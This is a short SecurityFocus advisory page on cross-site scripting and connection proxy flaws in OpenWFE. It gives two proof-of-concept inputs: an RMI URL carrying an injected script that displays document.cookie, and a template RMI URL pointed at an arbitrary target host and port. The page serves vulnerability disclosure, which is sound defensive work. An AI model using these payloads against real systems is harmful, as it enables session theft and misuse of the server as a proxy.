Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

OpenWFE Remote Cross-Site Scripting And Connection Proxy Vulnerabilities

No exploit is required to leverage these issues. The following proof of concepts have been provided:

To leverage the cross-site scripting issue:
rmi://www.example.com:7080/workSessionServer"><script>alert(document.cookie)</script>

To leverage the connection proxy issue:
rmi://<targetHostName>:<targetPort>/workSessionServer







 

Privacy Statement
Copyright 2008, SecurityFocus